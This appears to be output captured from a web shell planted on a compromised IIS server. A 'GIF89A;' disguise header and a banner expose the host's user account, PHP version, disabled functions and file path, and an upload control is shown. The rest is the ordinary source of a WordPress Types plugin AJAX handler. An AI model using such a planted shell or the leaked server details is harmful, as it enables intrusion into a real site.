GIF89A;
Server : Microsoft-IIS/10.0 System : Windows NT HMW9050 6.2 build 9200 (Unknow Windows version Standard Edition) i586 User : fatorc ( 0) PHP Version : 5.3.28 Disable Function : escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_open, shell_exec, system, dl, popen, php_check_syntax, php_strip_whitespace, symlink, link, openlog, apache_child_terminate Directory : e:/home/fatorc/Web/wp-content/plugins/types/library/toolset/types/embedded/includes/ |
Upload File : |
<?php /** * All AJAX calls go here. * * @todo auth */ function wpcf_ajax_embedded() { if ( isset( $_REQUEST['_typesnonce'] ) ) { if ( !wp_verify_nonce( $_REQUEST['_typesnonce'], '_typesnonce' ) ) { die( 'Verification failed (1)' ); } } else { if ( !isset( $_REQUEST['_wpnonce'] ) || !wp_verify_nonce( $_REQUEST['_wpnonce'], $_REQUEST['wpcf_action'] ) ) { die( 'Verification failed (2)' ); } } global $wpcf; switch ( $_REQUEST['wpcf_action'] ) { case 'insert_skype_button': if( ! current_user_can( 'edit_posts' ) ) { die( 'Authentication failed' ); } require_once WPCF_EMBEDDED_INC_ABSPATH . '/fields/skype.php'; wpcf_fields_skype_meta_box_ajax(); break; case 'editor_callback': if( ! current_user_can( 'edit_posts' ) ) { die( 'Authentication failed' ); } // Determine Field type and context $views_meta = false; $field_id = sanitize_text_field( $_GET['field_id'] ); // todo this could be written in like four lines if ( isset( $_GET['field_type'] ) && $_GET['field_type'] == 'usermeta' ) { // Group filter wp_enqueue_script( 'suggest' ); $field = types_get_field( $field_id, 'usermeta' ); $meta_type = 'usermeta'; } elseif ( isset( $_GET['field_type'] ) && $_GET['field_type'] == 'views-usermeta' ){ $field = types_get_field( $field_id, 'usermeta' ); $meta_type = 'usermeta'; $views_meta = true; } elseif ( isset( $_GET['field_type'] ) && $_GET['field_type'] == 'termmeta' ) { // Group filter wp_enqueue_script( 'suggest' ); $field = types_get_field( $field_id, 'termmeta' ); $meta_type = 'termmeta'; } elseif ( isset( $_GET['field_type'] ) && $_GET['field_type'] == 'views-termmeta' ){ $field = types_get_field( $field_id, 'termmeta' ); $meta_type = 'termmeta'; $views_meta = true; }else { $field = types_get_field( $field_id ); $meta_type = 'postmeta'; } $parent_post_id = isset( $_GET['post_id'] ) ? intval( $_GET['post_id'] ) : null; $shortcode = isset( $_GET['shortcode'] ) ? urldecode( $_GET['shortcode'] ) : null; $callback = isset( $_GET['callback'] ) ? sanitize_text_field( $_GET['callback'] ) : false; if ( !empty( $field ) ) { // Editor WPCF_Loader::loadClass( 'editor' ); $editor = new WPCF_Editor(); $editor->frame( $field, $meta_type, $parent_post_id, $shortcode, $callback, $views_meta ); } break; case 'dismiss_message': if( ! is_user_logged_in() ) { die( 'Authentication failed' ); } if ( isset( $_GET['id'] ) ) { $messages = get_option( 'wpcf_dismissed_messages', array() ); $messages[] = sanitize_text_field( $_GET['id'] ); update_option( 'wpcf_dismissed_messages', $messages ); } break; case 'pr_add_child_post': global $current_user; $output = '<tr>' . __( 'Passed wrong parameters', 'wpcf' ) . '</tr>'; $id = 0; $target_post_type = isset( $_GET['post_type_child'] ) ? sanitize_text_field( $_GET['post_type_child'] ) : ''; $has_permissions = current_user_can( 'publish_posts' ); $has_permissions = apply_filters('toolset_access_api_get_post_type_permissions', $has_permissions, $target_post_type, 'publish'); if ( ! $has_permissions ) { $output = '<tr><td>' . __( 'You do not have rights to create new items', 'wpcf' ) . '</td></tr>'; } else if ( //current_user_can( 'edit_posts' ) /*&&*/ isset( $_GET['post_id'] ) && isset( $_GET['post_type_child'] ) && isset( $_GET['post_type_parent'] ) ) { $relationships = get_option( 'wpcf_post_relationship', array() ); $parent_post_id = intval( $_GET['post_id'] ); $parent_post = get_post( $parent_post_id ); if ( !empty( $parent_post->ID ) ) { $post_type = sanitize_text_field( $_GET['post_type_child'] ); $parent_post_type = sanitize_text_field( $_GET['post_type_parent'] ); // @todo isset & error handling $data = $relationships[$parent_post_type][$post_type]; /* * Since Types 1.1.5 * * We save new post * CHECKPOINT */ $id = $wpcf->relationship->add_new_child( $parent_post->ID, $post_type ); if ( is_wp_error( $id ) ) { $output = '<tr>' . $id->get_error_message() . '</tr>'; } else { /* * Here we set Relationship * CHECKPOINT */ $parent = get_post( $parent_post_id ); $child = get_post( $id ); if ( !empty( $parent->ID ) && !empty( $child->ID ) ) { // Set post $wpcf->post = $child; // Set relationship :) $wpcf->relationship->_set( $parent, $child, $data ); // Render new row $output = $wpcf->relationship->child_row( $parent_post->ID, $id, $data ); } else { $output = '<tr>' . __( 'Error creating post relationship', 'wpcf' ) . '</tr>'; } } } else { $output = '<tr>' . __( 'Error getting parent post', 'wpcf' ) . '</tr>'; } } if ( !defined( 'WPTOOLSET_FORMS_VERSION' ) ) { echo json_encode( array( 'output' => $output . wpcf_form_render_js_validation( '#post', false ), 'child_id' => $id, ) ); } else { echo json_encode( array( 'output' => $output, 'conditionals' => array('#post' => wptoolset_form_get_conditional_data( 'post' )), 'child_id' => $id, ) ); } break; case 'pr_save_all': ob_start(); // Try to catch any errors $output = ''; if ( current_user_can( 'edit_posts' ) && isset( $_POST['post_id'] ) ) { $parent_id = intval( $_POST['post_id'] ); $post_type = sanitize_text_field( $_POST['post_type'] ); if ( isset( $_POST['wpcf_post_relationship'][$parent_id] ) ) { $children = wpcf_sanitize_post_realtionship_input( (array) $_POST['wpcf_post_relationship'][$parent_id] ); $wpcf->relationship->save_children( $parent_id, $children ); $output = $wpcf->relationship->child_meta_form( $parent_id, strval( $post_type ) ); } } if ( !defined( 'WPTOOLSET_FORMS_VERSION' ) ) { // TODO Move to conditional $output .= '<script type="text/javascript">wpcfConditionalInit();</script>'; } wpcf_show_admin_messages('echo'); $errors = ob_get_clean(); if ( !defined( 'WPTOOLSET_FORMS_VERSION' ) ) { echo json_encode( array( 'output' => $output, 'errors' => $errors ) ); } else { echo json_encode( array( 'output' => $output, 'conditionals' => array('#post' => wptoolset_form_get_conditional_data( 'post' )), 'errors' => $errors ) ); } break; case 'pr_save_child_post': ob_start(); // Try to catch any errors $output = ''; if ( current_user_can( 'edit_posts' ) && isset( $_GET['post_id'] ) && isset( $_GET['parent_id'] ) && isset( $_GET['post_type_parent'] ) && isset( $_GET['post_type_child'] ) && isset( $_POST['wpcf_post_relationship'] ) ) { $parent_id = intval( $_GET['parent_id'] ); $child_id = intval( $_GET['post_id'] ); $parent_post_type = sanitize_text_field( $_GET['post_type_parent'] ); $child_post_type = sanitize_text_field( $_GET['post_type_child'] ); if ( isset( $_POST['wpcf_post_relationship'][$parent_id][$child_id] ) ) { $fields = wpcf_sanitize_post_relationship_input_fields( (array) $_POST['wpcf_post_relationship'][$parent_id][$child_id] ); $wpcf->relationship->save_child( $parent_id, $child_id, $fields ); $output = $wpcf->relationship->child_row( $parent_id, $child_id, $wpcf->relationship->settings( $parent_post_type, $child_post_type ) ); if ( !defined( 'WPTOOLSET_FORMS_VERSION' ) ) { // TODO Move to conditional $output .= '<script type="text/javascript">wpcfConditionalInit(\'#types-child-row-' . $child_id . '\');</script>'; } } } wpcf_show_admin_messages('echo'); $errors = ob_get_clean(); if ( !defined( 'WPTOOLSET_FORMS_VERSION' ) ) { echo json_encode( array( 'output' => $output, 'errors' => $errors ) ); } else { echo json_encode( array( 'output' => $output, 'errors' => $errors, 'conditionals' => array('#post' => wptoolset_form_get_conditional_data( 'post' )), ) ); } break; case 'pr_delete_child_post': require_once WPCF_EMBEDDED_ABSPATH . '/includes/post-relationship.php'; $output = 'Passed wrong parameters'; if ( current_user_can( 'edit_posts' ) && isset( $_GET['post_id'] ) ) { $output = wpcf_pr_admin_delete_child_item( intval( $_GET['post_id'] ) ); } echo json_encode( array( 'output' => $output, ) ); break; case 'pr_pagination': require_once WPCF_EMBEDDED_INC_ABSPATH . '/fields.php'; require_once WPCF_EMBEDDED_INC_ABSPATH . '/fields-post.php'; require_once WPCF_EMBEDDED_ABSPATH . '/includes/post-relationship.php'; $output = 'Passed wrong parameters'; if ( current_user_can( 'edit_posts' ) && isset( $_GET['post_id'] ) && isset( $_GET['post_type'] ) ) { global $wpcf; $parent = get_post( intval( $_GET['post_id'] ) ); $child_post_type = sanitize_text_field( $_GET['post_type'] ); if ( !empty( $parent->ID ) ) { // Set post in loop $wpcf->post = $parent; // Save items_per_page $wpcf->relationship->save_items_per_page( $parent->post_type, $child_post_type, intval( $_GET[$wpcf->relationship->items_per_page_option_name] ) ); $output = $wpcf->relationship->child_meta_form( $parent->ID, $child_post_type ); } } if ( !defined( 'WPTOOLSET_FORMS_VERSION' ) ) { echo json_encode( array( 'output' => $output, ) ); } else { echo json_encode( array( 'output' => $output, 'conditionals' => array('#post' => wptoolset_form_get_conditional_data( 'post' )), ) ); } break; case 'pr_sort': $output = 'Passed wrong parameters'; if ( current_user_can( 'edit_posts' ) && isset( $_GET['field'] ) && isset( $_GET['sort'] ) && isset( $_GET['post_id'] ) && isset( $_GET['post_type'] ) ) { $output = $wpcf->relationship->child_meta_form( intval( $_GET['post_id'] ), sanitize_text_field( $_GET['post_type'] ) ); } if ( !defined( 'WPTOOLSET_FORMS_VERSION' ) ) { echo json_encode( array( 'output' => $output, ) ); } else { echo json_encode( array( 'output' => $output, 'conditionals' => array('#post' => wptoolset_form_get_conditional_data( 'post' )), ) ); } break; // Not used anywhere /*case 'pr_sort_parent': $output = 'Passed wrong parameters'; if ( isset( $_GET['field'] ) && isset( $_GET['sort'] ) && isset( $_GET['post_id'] ) && isset( $_GET['post_type'] ) ) { $output = $wpcf->relationship->child_meta_form( intval( $_GET['post_id'] ), strval( $_GET['post_type'] ) ); } if ( !defined( 'WPTOOLSET_FORMS_VERSION' ) ) { echo json_encode( array( 'output' => $output, ) ); } else { echo json_encode( array( 'output' => $output, 'conditionals' => array('#post' => wptoolset_form_get_conditional_data( 'post' )), ) ); } break;*/ /* Usermeta */ case 'um_repetitive_add': if ( isset( $_GET['user_id'] ) ) { $user_id = (int) $_GET['user_id']; } else { $user_id = wpcf_usermeta_get_user(); } if ( isset( $_GET['field_id'] ) && current_user_can( 'edit_user', $user_id ) ) { require_once WPCF_EMBEDDED_INC_ABSPATH . '/fields.php'; require_once WPCF_EMBEDDED_INC_ABSPATH . '/fields-post.php'; require_once WPCF_EMBEDDED_INC_ABSPATH . '/usermeta-post.php'; $field = wpcf_admin_fields_get_field( sanitize_text_field( $_GET['field_id'] ), false, false, false, 'wpcf-usermeta' ); global $wpcf; $wpcf->usermeta_repeater->set( $user_id, $field ); /* * * Force empty values! */ $wpcf->usermeta_repeater->cf['value'] = null; $wpcf->usermeta_repeater->meta = null; $form = $wpcf->usermeta_repeater->get_field_form( null, true ); echo json_encode( array( 'output' => wpcf_form_simple( $form ) . wpcf_form_render_js_validation( '#your-profile', false ), ) ); } else { echo json_encode( array( 'output' => 'params missing', ) ); } break; case 'um_repetitive_delete': if ( isset( $_POST['user_id'] ) && isset( $_POST['field_id'] ) && current_user_can( 'edit_user', intval( $_POST['user_id'] ) ) ) { require_once WPCF_EMBEDDED_INC_ABSPATH . '/fields.php'; $user_id = intval( $_POST['user_id'] ); $field = wpcf_admin_fields_get_field( sanitize_text_field( $_POST['field_id'] ), false, false, false, 'wpcf-usermeta' ); $meta_id = intval( $_POST['meta_id'] ); if ( !empty( $field ) && !empty( $user_id ) && !empty( $meta_id ) ) { /* * * * Changed. * Since Types 1.2 */ global $wpcf; $wpcf->usermeta_repeater->set( $user_id, $field ); $wpcf->usermeta_repeater->delete( $meta_id ); echo json_encode( array( 'output' => 'deleted', ) ); } else { echo json_encode( array( 'output' => 'field or post not found', ) ); } } else { echo json_encode( array( 'output' => 'params missing', ) ); } break; /* End Usermeta */ case 'repetitive_add': if ( current_user_can( 'edit_posts' ) && isset( $_GET['field_id'] ) ) { require_once WPCF_EMBEDDED_INC_ABSPATH . '/fields.php'; require_once WPCF_EMBEDDED_INC_ABSPATH . '/fields-post.php'; $field = wpcf_admin_fields_get_field( sanitize_text_field( $_GET['field_id'] ) ); $parent_post_id = intval( $_GET['post_id'] ); /* * When post is new - post_id is 0 * We can safely set post_id to 1 cause * values compared are filtered anyway. */ if ( $parent_post_id == 0 ) { $parent_post_id = 1; } $parent_post = get_post( $parent_post_id ); global $wpcf; $wpcf->repeater->set( $parent_post, $field ); /* * * Force empty values! */ $wpcf->repeater->cf['value'] = null; $wpcf->repeater->meta = null; $form = $wpcf->repeater->get_field_form( null, true ); echo json_encode( array( 'output' => wpcf_form_simple( $form ) . wpcf_form_render_js_validation( '#post', false ), ) ); } else { echo json_encode( array( 'output' => 'params missing', ) ); } break; case 'repetitive_delete': if ( current_user_can( 'edit_posts' ) && isset( $_POST['post_id'] ) && isset( $_POST['field_id'] ) ) { require_once WPCF_EMBEDDED_INC_ABSPATH . '/fields.php'; $post_id = intval( $_POST['post_id'] ); $parent_post = get_post( $post_id ); $field = wpcf_admin_fields_get_field( sanitize_text_field( $_POST['field_id'] ) ); $meta_id = intval( $_POST['meta_id'] ); if ( !empty( $field ) && !empty( $parent_post->ID ) && !empty( $meta_id ) ) { /* * * * Changed. * Since Types 1.2 */ global $wpcf; $wpcf->repeater->set( $parent_post, $field ); $wpcf->repeater->delete( $meta_id ); echo json_encode( array( 'output' => 'deleted', ) ); } else { echo json_encode( array( 'output' => 'field or post not found', ) ); } } else { echo json_encode( array( 'output' => 'params missing', ) ); } break; case 'wpcf_entry_search': if( current_user_can( 'edit_posts' ) && isset($_REQUEST['post_type'])) { $posts_per_page = apply_filters( 'wpcf_pr_belongs_post_numberposts', 10 ); $args = array( 'posts_per_page' => apply_filters( 'wpcf_pr_belongs_post_posts_per_page', $posts_per_page ), 'post_status' => apply_filters( 'wpcf_pr_belongs_post_status', array( 'publish', 'private' ) ), 'post_type' => sanitize_text_field( $_REQUEST['post_type'] ), 'suppress_filters' => 1, ); if ( isset( $_REQUEST['s'] ) ) { $args['s'] = $_REQUEST['s']; } if ( isset( $_REQUEST['page'] ) && preg_match('/^\d+$/', $_REQUEST['page']) ) { $args['paged'] = intval($_REQUEST['page']); } $the_query = new WP_Query( $args ); $posts = array( 'items' => array(), 'total_count' => $the_query->found_posts, 'incomplete_results' => $the_query->found_posts > $posts_per_page, 'posts_per_page' => $posts_per_page, ); if ( $the_query->have_posts() ) { while ( $the_query->have_posts() ) { $the_query->the_post(); $post_title = get_the_title(); if ( empty($post_title) ) { $post_title = sprintf( __('[empty title] ID: %d', 'wpcf'), get_the_ID() ); } $posts['items'][] = array( 'ID' => get_the_ID(), 'post_title' => $post_title, ); } } /* Restore original Post Data */ wp_reset_postdata(); echo json_encode($posts); } else { echo json_encode( array( 'output' => 'params missing', ) ); } break; case 'wpcf_entry_entry': if( current_user_can( 'edit_posts' ) && isset($_REQUEST['p'])) { $wpcf_post = get_post( (int) $_REQUEST['p'], ARRAY_A ); if ( isset($wpcf_post['ID']) ) { $post_title = $wpcf_post['post_title']; if ( empty($post_title) ) { $post_title = sprintf( __('[empty title] ID: %d', 'wpcf'), $wpcf_post['ID'] ); } echo json_encode( array( 'ID' => $wpcf_post['ID'], 'post_title' => $wpcf_post['post_title'], ) ); } else { echo json_encode( array( 'output' => 'params missing',)); } } else { echo json_encode( array( 'output' => 'params missing', ) ); } break; default: break; } if ( function_exists( 'wpcf_ajax' ) ) { wpcf_ajax(); } die(); } /** * Sanitize input array with post children and their fields. * * @param array $children_raw See WPCF_Relationship::save_children(). * @return array Data with the same structure as input, but sanitized. * * @todo since * @todo move to better location if such exists */ function wpcf_sanitize_post_realtionship_input( $children_raw ) { $children = array(); foreach( $children_raw as $child_id_raw => $child_fields_raw ) { $child_id = intval( $child_id_raw ); $children[ $child_id ] = wpcf_sanitize_post_relationship_input_fields( $child_fields_raw ); } return $children; } /** * Sanitize input array with post child fields. * * Note that only field keys are sanitized. Values can be arbitrary. * * @param array $fields_raw See WPCF_Relationship::save_child(). * @return array Data with the same structure as input, but sanitized. * * @todo since * @todo move to better location if such exists */ function wpcf_sanitize_post_relationship_input_fields( $fields_raw ) { $fields = array(); foreach( $fields_raw as $field_key_raw => $field_value_raw ) { $field_key = sanitize_text_field( $field_key_raw ); $fields[ $field_key ] = $field_value_raw; } return $fields; }